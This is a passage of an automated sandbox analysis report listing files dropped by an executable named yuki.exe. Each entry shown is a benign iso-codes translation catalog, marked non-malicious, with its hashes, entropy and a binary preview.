                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iOdD1xjt02Uki7/CqLLIqLDoMXmBQWicQvQ:R5t0UiTCTZMXmCvQ
                                                                                                    MD5:71451C1EA205473B405A6D054024D858
                                                                                                    SHA1:CCE4FD4E14DFA6B69D35188C0C69A28E869F85C7
                                                                                                    SHA-256:F21E890F30BAAB6A57F20F44E4A95423AF4F172305AE7AF34709ED22140A06DD
                                                                                                    SHA-512:E9D27D7C49229B5BF6DB1AF02BED564A23188C11C469E407363A099B5D93C3EF47C942C413CD19E8BA71D86F618625BC9E1E8E321ED6DAA3E488DA17F67E7B5D
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...h...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2005-10-21 15:11+0300.Last-Translator: Albert Fazl. <tatarish.l10n@gmail.com>.Language-Team: Tatarish <tatarish.l10n@gmail.com>.Language: tt.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit........... ..........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 150 messages, Project-Id-Version: iso_639-3 '\320\220\320\261\321\205\320\260\320\267\321\207\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7206
                                                                                                    Entropy (8bit):4.980066008689041
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kTlQrqjEHLZiD+O54BNfh70wSASCtlmXMZ6w9NBUlqxRljSPh51TrSuGd5zhfL7N:erjKSAN0wSuWcZHjBUwljKPSuGd5dfN
                                                                                                    MD5:8C044216759A6FD075E819FD15503047
                                                                                                    SHA1:656CEAB5067004625E807AB778867D70A9B16BE4
                                                                                                    SHA-256:CBC7769E33539026110C5BDDAF6C69B69AE1A73C5E68E95897C743A3262260FB
                                                                                                    SHA-512:6F74420EA4309FB47A36095653832A49D3A745232A5970DAE11299ED418A7C9270A5760163141CDD00DA60C20DEDC498F44A016C9684A935C004BF22DE1A7E3E
                                                                                                    Malicious:false
                                                                                                    Preview:........................|.......................................................................................................'......./.......6.......A.......I.......Q.......Y.......`.......j.......r.......z.......................................................................................................................................................................".......).......1.......:.......@.......G.......N.......T.......^.......h.......l.......w...............................................................................................................................................................................'.......2.......;.......E.......M.......R.......X.......`.......g.......q.......w...............................................................................................................................................................).......1.......7.......>.......E.......O.......V.......f.......n.......x.......~.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_15924 'Tadlamit'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):798
                                                                                                    Entropy (8bit):5.281028546311157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i26d+qNuu06tHbLxCfVt02Uk1A/rkiLLO/4itbMXmBQWiOWIDLdPzuMv:m8l6NnCVt0U+gl/3MXmGIXdbn
                                                                                                    MD5:F58DAB8FB5BFF15DE46D28F114749CFD
                                                                                                    SHA1:D25294017E2D1899F2AF30DCFA3BB90A2BC4D365
                                                                                                    SHA-256:553BBD3F585C3550388BCEA20FE2AC751FAF098D00174B6BB22071F563EC27A7
                                                                                                    SHA-512:CF26C6D1F641C533B14EE9050147FABC5795EA09562D38C978EFEE9B3C0DAD94229E00F15766B8175F430E362AE483D059B6051BFFBB4A3D687C903CD01EAB39
                                                                                                    Malicious:false
                                                                                                    Preview:................T........................................................................................................................................................................Adlam.Afaka.Arabic.Batak.Bengali.Brahmi.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-04-30 13:31+0000.Last-Translator: Hakim Oubouali <hakim.oubouali.skr@gmail.com>.Language-Team: Tamazight (Central Atlas) <https://hosted.weblate.org/projects/iso-codes/iso-15924/tzm/>.Language: tzm.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n >= 2 && (n < 11 || n > 99);.X-Generator: Weblate 4.7-dev..Tadlamit.Tafakayt.Ta..abt.Tabatakit.Tabangalit.Tabrahmit.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-1 'Aruba'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):608
                                                                                                    Entropy (8bit):5.369629137604653
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:ib9+lXxLtt02Uk1A/rkiLLO/4F5jtbMXmBQWiOWIDLdVn:isXjt0U+gl/elMXmGIXdVn
                                                                                                    MD5:CB06EC38C80394E041E8130702503E3B
                                                                                                    SHA1:4934DC9B1523F83FA8FC246BC53FDED6C5EE9AA1
                                                                                                    SHA-256:E3B149A176220234E75036A776096831602ED6D6B4EFF70187BEA3801D13D8C5
                                                                                                    SHA-512:75DF4D80E805A48EF6C01C1E8F3EF49E0DE3108E95F0FB9EF5208ADEB9662A8D8237700B03686AB8AA618657C4BC0FC718CCC5936CB66392A7F1C91AFDECF497
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......W.......Z........................Aruba.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-04-30 13:31+0000.Last-Translator: Hakim Oubouali <hakim.oubouali.skr@gmail.com>.Language-Team: Tamazight (Central Atlas) <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/tzm/>.Language: tzm.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n >= 2 && (n < 11 || n > 99);.X-Generator: Weblate 4.7-dev..Aruba.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.170174652753135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGLbMXmBQ8KMW0YEi9:i4cxxRt02Ukx/iximCg5IT8bMXmBQWi9
                                                                                                    MD5:3472BF256E926ACCBAEEC0CD310BED25
                                                                                                    SHA1:5DC79072DED4058022A0ED58548F1C0DE7617E3B
                                                                                                    SHA-256:0F5B05386F71E0117530208517A790BA54978BCF27A94A112BAEFD5BF64344BD
                                                                                                    SHA-512:CF107EDDA6434594D98DD4AEE625DD7FF564D53DA8D0DFBE0119BCA0C5EF00F4C728C3CA144B50165B502033E44A61372D7656D5CA2B5DF949117947C95A2E2C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: tzm.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\330\246\330\247\331\201\330\272\330\247\331\206\331\211\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29812
                                                                                                    Entropy (8bit):5.339129083674573
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZicIEtoNItmsWP4XdAIRs1pSmh6lyZWPC:Lvnzs1pSg6iWPC
                                                                                                    MD5:C1B8C0731D7CFCD618E9599B265D8511
                                                                                                    SHA1:E2763BFA6CA87FCF87FD671D49CD09726C8D4EB6
                                                                                                    SHA-256:5D056DF8CF71F954D1075896B2E39444BED2230884358B788632CFEA0E59CC9F
                                                                                                    SHA-512:1D202C6EABB221997E8EC90C7F6E2647528E538E0CF35B0AF90D498EEA1CAB926193A06D5A0B11135A51CD6F9AD320AF84E11F7F95399E9494380218A5F8C8A7
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\330\246\333\225\331\206\332\257\331\204\331\211\331\212\333\225\331\206\331\211\332\255 \330\246\330\247\331\206\330\252\330\247\330\261\331\203\330\252\331\211\331\203\330\247\330\257\331\211\331\203\331\211 \330\252\333\225\333\213\333\225\331\204\331\211\331\203\331\211'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3467
                                                                                                    Entropy (8bit):5.506974208239775
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADQIvDsFkivGqIfdvqNuoUo3K3XJG59PCHvfPCHxCH1S/D5RL3n0ZX4aSTu:qDQIvD8yBoda3ZtvqxCeP307eu
                                                                                                    MD5:7244C650A206202EF710A7918A8E5C6F
                                                                                                    SHA1:C544B9F5C91555DF841D587FD8BBE1B7A072118D
                                                                                                    SHA-256:F33981EC967BE0DB39223F5BBA372CD0891DA5B729D2C3D1515BF348A2C7C8FA
                                                                                                    SHA-512:03B16661DEFFBCF8FADFD2D10173E0A40447DF9071357CC77C9C53D1DA2D1C7E59AA55D3B971399D4D3F7E60BFA15B03F6C62ED53D6E3668047CEEF0CC49448D
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................F...9...O.......h.......3...9...n...m...........................A..."...D...d..._.......>.......-...H.......v...........<.......................k.......$.......(.......................H.......S...M...........B...............?...)...!...i........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\260\320\264\320\273\320\260\320\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12713
                                                                                                    Entropy (8bit):5.2995843129137405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:deoDXOltU4WjV9qWxa5hW81ZD2mENTPINfz:0oDXOg4WjVDxa5hW81ZLEpa7
                                                                                                    MD5:BFA4889AF0A8E3BDA68E0B25F6D67A29
                                                                                                    SHA1:CBF4D065325C2C34531C36257AB9D194FF561DFF
                                                                                                    SHA-256:328AB066A595B71CC726D668864F160742511A1A65139BC46ADB3270584D88C8
                                                                                                    SHA-512:4DF4C2F1BDF5A32358E695F73B2BC9F42B0681568EBDDCBD616303E73DABFFE8C95C38D37E65400CD9E2D436DA551EBF53D13DB0DFD96E73A5AF3CE5BDD0AECE
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\321\226\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29887
                                                                                                    Entropy (8bit):5.31317671818373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0o0648fmsWP48WAIYKU2WwZudLi5Z2TU1TZGErGe3Is9:b0648y22L1U1N55Ik
                                                                                                    MD5:3391C50061FAB612994A9F57750CE213
                                                                                                    SHA1:3DDDD647B1C7AA025CE39BCAD44333AED11EA467
                                                                                                    SHA-256:CD2BFE4F56C0CB4074FEAE6A9CCC22B6B3F80A7B530909D159C30ACD50E9F7F9
                                                                                                    SHA-512:F0E8D3B4EB116C3C6248C7597462A2492B6441937AABB1012F140FE16E8ADE5111FB546DD0FD048AA9BFC5218237BF41176D4BDEAF5B916E7A7D0226CD2087C2
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4820 messages, Project-Id-Version: iso_3166-2 '\320\220\321\201\321\226\321\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):255945
                                                                                                    Entropy (8bit):5.503167211439664
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:C5lv7Ti+Jjo6IQhT9UN9PkeWUKtmsw8qdkUd+ilkrzIzwuVRLmazDZexClnV8D1r:8+YiNCd9RPULZr5OFWlgUFC
                                                                                                    MD5:36E5A83CAC8C524E645371AE3FF66081
                                                                                                    SHA1:53E80002DF6F0823D39D0D253A7E285FD973F4E0
                                                                                                    SHA-256:C7704825C54B17F990C2815909D32A2C51B23CA381225213E262ECFB6F1555C3
                                                                                                    SHA-512:6ABCC63A1FCC8869417F3F6C32584EDCD52A884C3A35F6C70E0068FC274B005C51FF6A648CC406D7BE3BE891E01B8BFAB2D015C55B0B59F122DA024DF045D2CE
                                                                                                    Malicious:false
                                                                                                    Preview:........................\-.................................................................................%.......*.......2.......7.......@.......E.......M.......m.......s.......|...................................................................................................................................).......6.......;.......J.......Q.......f.......l.......|......................................................................................................................................+...........K.......P.......c.......j.......w.......}...................................................................................................&.......1.......F.......R.......^.......j.......x...........................................................................................&.......3.......=.......I.......X.......`.......j.......t.......}...........................................................................................%.......3.......C.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\321\214\320\272\321\226 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\275\321\226 \320\242\320\265\321\200\320\270\321\202\320\276\321\200\321\226\321\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3668
                                                                                                    Entropy (8bit):5.573896521207671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3OMcFQ+vGqIfdvqN5CoUOsjczr6Elrejc:rLvOxFQ+yaCoZsjciY
                                                                                                    MD5:5E604368F3A70D97E3E56C1E2D312A9C
                                                                                                    SHA1:9A5239A77C818A42F1BCE1300CA4E7BB6A8D3027
                                                                                                    SHA-256:341D90A8E0F57255A74F6C93D1E3F103C573C5D81929D0F3C5B474AABC0EB78A
                                                                                                    SHA-512:AD90B942E45616ADEB6129032ADCFD865CD0DA8AC3D12E7D5BDB3239483E745A3CA4643766D01FE1B920DE2016FFA2BC5050331CBD9FF003FB52BB399CBEDF59
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................>.......O...F...W.......1.......d... ..........."...............).......-.......T...)...>...~...3.......................>...+...'...j...........O.......,.......$...'.......L.......Y...K...y...M...............=...B...........E.......Y...........6........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\320\236\320\264\320\270\320\275\320\270\321\206\321\217 \320\276\320\261\320\273\321\226\320\272\321\203 \320\220\320\221\320\240'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12535
                                                                                                    Entropy (8bit):5.3054661881541625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:SwpJsak76TL0G/Uo/WEH+zqRsmSi9mwTj+rNN:SImaI8YAUoOg+tmSi0wTjeN
                                                                                                    MD5:B4316A074B0286B8155A6AE950F04ECB
                                                                                                    SHA1:C919A931B9AD7E5956FFD5326DF9D468B09885CE
                                                                                                    SHA-256:2A3D96C3B8F0BEEAEF342E9DBCE56F9C2508B5294162B57F65D5E9933C6D30DD
                                                                                                    SHA-512:87711DB288028AF59DCD0AD8176538BDC47B773DA2E36C65816295CA8DE1BE876F3E3E7551DCE626ADC1DCADABAC3EFFD771C08359262AFBB1FF505CA54F2B28
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9327 messages, Project-Id-Version: iso_639-3 '\320\260\321\200\320\265\320\260\321\200\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):511201
                                                                                                    Entropy (8bit):5.445562713348814
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:h/5ebkRBJR5Z1Sqkd9pwN7FhvOh/IvgKXd3qwYHvio4PpiFEvZ3QJGpHi+hhBb/e:nG90Xv8AZBWHvibBKE3CDIU/17wTHobr
                                                                                                    MD5:3F600A8F684C194E0E44ED4CF6B3F404
                                                                                                    SHA1:5B8946409EE6B6CA2FB83280175C4D28A35DE526
                                                                                                    SHA-256:C24AA12F81E6B5135C725E5DF8E746A116C48D9B1641F820E95C946614963D7E
                                                                                                    SHA-512:EB62D51782C9237028198C8EDBBFF3D1A3EA1474EA94D748ACA17EFE7BA0BA9959C9DB197D140C00615C36697B52DDE44F60F0EBAA6BD42185FAA9D71E68D4AB
                                                                                                    Malicious:false
                                                                                                    Preview:........o$.......#...0...G......`.......a.......j.......t.......y............................................................................................................................................................... .......&.......*.......7.......<.......A.......F.......L.......T.......Y.......j.......r.......y.......~.......................................................................................................................................$.......+.......1.......8.......<.......K.......U.......e.......s.......................................................................................................................................................$.......*.......8.......>.......C.......S.......Y.......`.......d.......i.......n.......................................................................................2.......=.......D.......M.......S.......a.......k.......u.......|.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\276-\320\260\320\267\321\226\320\271\321\201\321\214\320\272\321\226 \320\274\320\276\320\262\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9363
                                                                                                    Entropy (8bit):5.2324686929464725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxF/iJXuuaSE0BfNcakLFKWYTUn6gv+UwH7NWdj:X74ZE0BfNcak5KWYo6gv+Uu7NWdj
                                                                                                    MD5:1DB7CB96CAE6B5983B9F074456BD372A
                                                                                                    SHA1:5203D4B051688CC8531D91F83D24124B990D5F24
                                                                                                    SHA-256:D76167CCF84E427D68019F2C056EE5E4F3A8E9060E940FC5CE975E4A537BA0FF
                                                                                                    SHA-512:1D5CA8933FC9729C541A6FD845CDDB2ECCAB2D9A8AD18FE7C8DED59D36B59B8E935FB8C0604F02963F4D9AFC3BA25B0BBA67892AD121A38AD0290570FA3E74F6
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#......................................."...+...%...N.......t...........!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 222 messages, Project-Id-Version: iso_3166-1 '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11711
                                                                                                    Entropy (8bit):5.136480548982286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eRT2GolZt2StI8ml5bxpTJB6/ugoxu0Zb71p6l+yTm7wBcCjTAOUIHMKFsB5nP:eJwlZt2Um7bxp10/ugoxu0Zv1pm+yTmx
                                                                                                    MD5:EC4333CA6BC0D0156B02B2753B36BB46
                                                                                                    SHA1:1249300241E90778EBB1F578097AF49E1130A56E
                                                                                                    SHA-256:B5C0BA0E49A1E1AF6F52132956853635B92CE6888EFB2814F30727584D936E6F
                                                                                                    SHA-512:7350B7620166DC2AC1115BB394A1960299445BA3F03ACBFA5BB069B76239FB2A23FAB661660B6A3966CC47706013FD160B8A2516DDF714632CCA58DCD1473986
                                                                                                    Malicious:false
                                                                                                    Preview:....................3................................................................................... .......*.......2.......8.......B.......J.......U.......].......h.......q.......y...............................................................................................................&...............7.......@.......G.......V.......o.......t.......z..............................................................................................................................."...............@.......H.......Q......._.......~.......................................................................................................................................................(......./...!...5.......W.......`.......j.......r.......z.......................................................................................................................................................'......./.......7.......=.......K.......U.......`.......k.......r.......{...............................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 198 messages, Project-Id-Version: iso_3166-1 'Afg\312\273oniston'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8863
                                                                                                    Entropy (8bit):4.745674817543107
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:+OPx7JUgwiLZyvzRJfT+MagLLkuNb8GPzn/xqFR7Q:fPBxLZy7RJfargLLkuNPTgFRk
                                                                                                    MD5:D8CC41CC9CA64420959ACAF28FAFE118
                                                                                                    SHA1:B3C2C8F20C86DF797170EAC1E44920E00611DABD
                                                                                                    SHA-256:49028F69DC2D3E4AEE7FE29744B912CE8FE3E15D43846C2AD892F03DF95541FA
                                                                                                    SHA-512:1EAC6DC5BEF6B181675F0D118574657FB39F1E36999A47C94C08F020F421A38ED127F8900A936FEF4DA0E44AB3B72C4CE90C893AB58A19E252A9DDCC58B218A7
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|....................................................................................................... .......*.......2.......=.......E.......P.......Y.......a.......i.......p.......v.......~...............................................................................................................................'......./.......<.......G.......O.......T.......[.......j.......r.......{...............................................................................................................#.......).......1.......9.......?.......I.......P.......Z.......b.......m.......r.......|.......................................................................................................................................................................!.......,.......3.......;.......C.......K.......Q......._.......i.......t...............................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 185 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7913
                                                                                                    Entropy (8bit):4.674201973207991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:tSLivXwR5bRQFcVIa6bs1THFUTaf0sKk5T0FUya8+ZC5x:+mO5muVYbQzFUWf9Kk5AFUZ835x
                                                                                                    MD5:E66DA1FAEA5593D5A9BEF3BE5ABE2DBF
                                                                                                    SHA1:1F026EB29DEC96A9B4D1322E359D25AD38A86254
                                                                                                    SHA-256:50F9E0F48B7057CF9D140E0473A4E05774155D41507EC1CC82B980F42F19DAD6
                                                                                                    SHA-512:C885F4BDEC517866CE4E4B7603F5BDD9C56721CF8000703ABF2D0CFE7DFECAC9AB3D149B8D7FA2DE6A21F9306F56C042106CE9D7B294287F6B26D709ED7CC9EF
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................................%.......0.......8.......@.......K.......T.......\.......d.......k.......q.......y.......................................................................................................................................(.......0.......6.......A.......I.......N.......U.......d.......l.......u.......~.......................................................................................................................................&.......,.......3.......=.......E.......J.......T.......[.......i.......p.......v...............................................................................................................................................................................#.......1.......;.......F.......Q.......X.......a.......j.......o.......u.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_3166-2 'American Samoa'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):924
                                                                                                    Entropy (8bit):5.010450394587115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:sq9OgwXF9lVAST1gknhNkyzYSt0UFXapHsXmFhNkyzW:s/TlVAMCmhNpU/UIpHtFhNpa
                                                                                                    MD5:D9B9982186788DF1FF6B6CD60C1B8189
                                                                                                    SHA1:E2069A6A57115B1B13A17479EAF85FD91B3F6E8B
                                                                                                    SHA-256:1CEB8CEA9B7C72F5F6BE3E3D83BF869F4D4421C822B347DF31DF365A66EB96F6
                                                                                                    SHA-512:EFF42611C3FA1FD8A587AEF90DEF336AE0AE5BF60F7F7C10C69143704630736AFCFC68F3A6C5AAE9E34A58CCD959BC1F8B2D09C4E8BC5E8E1B776078D9E866E4
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......@.......F.......M.......V.......^.......c.......m.......r.......x...............................*.......9.......?.......F.......O.......W.......\.......f.......k.......q........................................................................................American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Guatemala.Mali.Niger.Northern Mariana Islands.Puerto Rico.Zaire.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 22:07SAST.Last-Translator: Fhatuwani Rambau <fhatuwani@translate.org.za>.Language-Team: Venda <venda@translate.org.za>.Language: ve.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Guatemala.Mali.Niger.Northern Mariana Islands.Puerto Rico.Zaire.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):514
                                                                                                    Entropy (8bit):5.208623537436132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iU/c1xjt02UkFf/hUdrvedD8HsXmBQWiR8ZAp:M5t0UFXapHsXmg
                                                                                                    MD5:5A6AFFA84AFD5E5696029C79ACFA9CD1
                                                                                                    SHA1:6639C6D5F02B9AF535D24F70AEE2C54DC6048175
                                                                                                    SHA-256:DCD8134B93B9C72855E1E1A041041F807D49641D5E28D0D2F63A5CD168C8C853
                                                                                                    SHA-512:339A18F0769290A86DEA8D2E5DCEEF48A37E27C5CCD1BCC92E21DF9A76D278B6B874B75A0E9D1AB88C038279FB45DEAA701DD49834393C1F4AF02BF75AB1FF50
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 22:07SAST.Last-Translator: Fhatuwani Rambau <fhatuwani@translate.org.za>.Language-Team: Venda <venda@translate.org.za>.Language: ve.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 41 messages, Project-Id-Version: iso_639-3 'Abkhazian'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1997
                                                                                                    Entropy (8bit):4.667940178067642
                                                                                                    Encrypted:false
